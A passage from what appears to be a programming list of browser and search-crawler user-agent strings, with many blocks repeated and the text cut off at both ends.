(SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) 